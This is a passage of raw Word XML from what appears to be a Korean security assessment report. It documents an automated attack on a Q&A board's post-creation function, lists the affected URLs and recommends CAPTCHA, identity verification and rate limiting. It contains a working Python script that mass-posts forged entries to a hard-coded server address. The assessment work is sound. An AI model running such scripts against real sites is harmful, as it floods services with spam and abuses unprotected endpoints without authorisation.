                      <a:ext cx="4572000" cy="7636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29384" w14:textId="2A30579B" w:rsidR="00B71A2E" w:rsidRDefault="00B71A2E" w:rsidP="00B71A2E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="_Toc209094636"/>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63</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 실행 로그</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w14:paraId="03478D6A" w14:textId="3BEEB6C4" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C9C76" w14:textId="28FC8996" w:rsidR="00F4259D" w:rsidRDefault="00F4259D" w:rsidP="00F4259D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Case 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">게시물 등록 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>기능 자동화 공격</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B46826" w14:paraId="7F2DB99B" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="23A1CF30" w14:textId="094CF8E8" w:rsidR="00B46826" w:rsidRPr="00003C3D" w:rsidRDefault="00B46826" w:rsidP="00B46826">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00003C3D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r>
            <w:r w:rsidRPr="00003C3D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> VS code 디버그 콘솔</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC7FA1B" w14:textId="3E7B84C8" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD2C8BC" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t>from time import sleep</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306B8F7E" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="296C9B48" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t># 글쓰기 URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468DF013" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t>url = “</w:t>
            </w:r>
            <w:r w:rsidRPr="00181412">
              <w:t>http://43.203.87.232</w:t>
            </w:r>
            <w:r>
              <w:t>/qna/insertQna.do”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E3FD75A" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0235785B" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t># 세션 생성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5856FAAC" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t>session = requests.Session()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BDB7A7F" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t>member_no = “34”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF714BB" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1AE3256C" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t># 10개의 게시글 작성 루프</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171F71C2" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t>for i in range(1, 11):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5BEAEE" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    files = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5082ED" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “QNA_TITLE”: (None, f”자동 글 제목 {i}”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BBAF76" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “QNA_CATEGORY”: (None, “61”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F473B40" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “QNA_NAME”: (None, “오토봇”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB8E9FB" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “MEMBER_EMAIL”: (None, f”bot{i}@example.com”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F512F5" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “QNA_CONTENT”: (None, f”이 글은 자동화 테스트로 작성된 {i}번째 게시글입니다.”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE5137F" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “QNA_PASSWD”: (None, “1234”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3529EED1" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “QNA_SECRET”: (None, “0”),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BB8F2F" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        “MEMBER_NO”: (None, member_no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A70CDF3" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6499AEE1" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76D6D224" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    response = session.post(url, files=files)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A489834" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    print(f”[{i}] 응답 코드: {response.status_code}”)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E03D6BC" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3451CDF4" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    if response.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4156D372" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        print(f”작성 성공”)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AFA9308" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39E772D9" w14:textId="77777777" w:rsidR="00B46826" w:rsidRDefault="00B46826" w:rsidP="00B46826">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:keepNext/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        print(f”작성 실패”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CEFF103" w14:textId="2903871B" w:rsidR="0063774C" w:rsidRDefault="00B46826" w:rsidP="0063774C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc209094679"/>
      <w:r>
        <w:t xml:space="preserve">[코드] </w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve"> SEQ [</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText>코드</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve">] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시물 작성 자동화 코드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w14:paraId="018AC013" w14:textId="77777777" w:rsidR="0063774C" w:rsidRDefault="0063774C" w:rsidP="0063774C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C539D94" w14:textId="6BFDC566" w:rsidR="0063774C" w:rsidRDefault="0063774C" w:rsidP="0063774C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EE4885" wp14:editId="28218955">
            <wp:extent cx="4572000" cy="2240493"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="1444394001" name="그림 144439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r="8574" b="3066"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="22404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F6B17E" w14:textId="512FDEE6" w:rsidR="00DC14F2" w:rsidRDefault="0063774C" w:rsidP="00DC14F2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="434" w:name="_Toc20909463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64</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00046521">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00046521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 실행 로그</w:t>
      </w:r>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w14:paraId="49815D9F" w14:textId="77777777" w:rsidR="00DC14F2" w:rsidRDefault="00DC14F2" w:rsidP="00DC14F2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB38F38" w14:textId="6D03E552" w:rsidR="00DC14F2" w:rsidRDefault="00DC14F2" w:rsidP="00DC14F2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A9FFDF9" wp14:editId="299E476A">
            <wp:extent cx="4571609" cy="2590800"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="19050"/>
            <wp:docPr id="1444394002" name="그림 144439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7609"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="25910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90E954" w14:textId="22630323" w:rsidR="00B46826" w:rsidRDefault="00DC14F2" w:rsidP="00DC14F2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="_Toc20909463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65</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시판에 작성된 게시물 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p w14:paraId="2E189EEB" w14:textId="17A27BE8" w:rsidR="0096203F" w:rsidRDefault="0096203F" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527BCF3B" w14:textId="77777777" w:rsidR="00AE0026" w:rsidRPr="00CB22A6" w:rsidRDefault="00AE0026" w:rsidP="00AE0026">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AE0026" w:rsidRPr="00B112DB" w14:paraId="21CA9F17" w14:textId="77777777" w:rsidTr="00FB47FA">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72C9E3AC"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46302423"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3FE726DC"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AE0026" w:rsidRPr="00B112DB" w14:paraId="23409F94"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545EEAC" w14:textId="77777777" w:rsidR="00AE0026" w:rsidRPr="00CB22A6" w:rsidRDefault="00AE0026" w:rsidP="00FB47F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E23AF7" w14:textId="5D8F1FC8" w:rsidR="00AE0026" w:rsidRPr="00CB22A6" w:rsidRDefault="00AE0026" w:rsidP="00FB47FA">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sidR="002C07BF">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FFCE095" w14:textId="5B51895E" w:rsidR="00AE0026" w:rsidRPr="002C07BF" w:rsidRDefault="002C07BF" w:rsidP="00FB47FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00225909">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/loginForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0026" w:rsidRPr="00B112DB" w14:paraId="78655DC9"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136B687" w14:textId="77777777" w:rsidR="00AE0026" w:rsidRPr="00CB22A6" w:rsidRDefault="00AE0026" w:rsidP="00FB47F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0510A4" w14:textId="1A77D473" w:rsidR="00AE0026" w:rsidRDefault="00AE0026" w:rsidP="00FB47FA">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2C07BF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>회원가입</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C5C34E0" w14:textId="620FD02E" w:rsidR="00AE0026" w:rsidRPr="00987A57" w:rsidRDefault="002C07BF" w:rsidP="00FB47FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00000859">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/joinForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C07BF" w:rsidRPr="00B112DB" w14:paraId="18D76D4D"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0D940E1" w14:textId="1B88D70D" w:rsidR="002C07BF" w:rsidRPr="00CB22A6" w:rsidRDefault="002C07BF" w:rsidP="00FB47FA">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AB555" w14:textId="068EC58C" w:rsidR="002C07BF" w:rsidRDefault="002C07BF" w:rsidP="00FB47FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">메인페이지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F2B3D31" w14:textId="13B262A2" w:rsidR="002C07BF" w:rsidRPr="006B5B69" w:rsidRDefault="002C07BF" w:rsidP="00FB47FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00225909">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>qna/insertQna.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F783AFD" w14:textId="77777777" w:rsidR="00AE0026" w:rsidRPr="00AE0026" w:rsidRDefault="00AE0026" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0195587E" w14:textId="77777777" w:rsidR="0096203F" w:rsidRPr="00CB22A6" w:rsidRDefault="0096203F" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A5641" w14:textId="294FB087" w:rsidR="00BE3695" w:rsidRDefault="00123801" w:rsidP="00145B4D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">자동화 공격은 </w:t>
      </w:r>
      <w:r w:rsidRPr="00123801">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>CAPTCHA, 이메일·휴대</w:t>
      </w:r>
      <w:r w:rsidR="00874EBA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>전화</w:t>
      </w:r>
      <w:r w:rsidRPr="00123801">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 번호 본인인증과 같은 검증 절차를 도입하여 </w:t>
      </w:r>
      <w:r w:rsidR="00A7767A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 도구,</w:t>
      </w:r>
      <w:r w:rsidR="00A7767A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7767A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">스크립트 그리고 봇을 통한 공격을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00123801">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>막을 수 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00614706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00614706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또한,</w:t>
      </w:r>
      <w:r w:rsidR="00614706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00614706" w:rsidRPr="00614706">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidR="00614706" w:rsidRPr="00614706">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 측에서는 IP나 계정 단위의 비정상적인 요청</w:t>
      </w:r>
      <w:r w:rsidR="00ED0AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00ED0AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED0AC3" w:rsidRPr="00ED0AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>단시간에</w:t>
      </w:r>
      <w:r w:rsidR="00ED0AC3" w:rsidRPr="00ED0AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED0AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>많은 요청 등</w:t>
      </w:r>
      <w:r w:rsidR="00614706" w:rsidRPr="00614706">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 탐지해 속도 제한이나 차단 조치를 적용해야 </w:t>
      </w:r>
      <w:r w:rsidR="00ED0AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>합니다.</w:t>
      </w:r>
      <w:r w:rsidR="003C6C3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6C3E" w:rsidRPr="003C6C3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등록된</w:t>
      </w:r>
      <w:r w:rsidR="003C6C3E" w:rsidRPr="003C6C3E">
        <w:rPr>
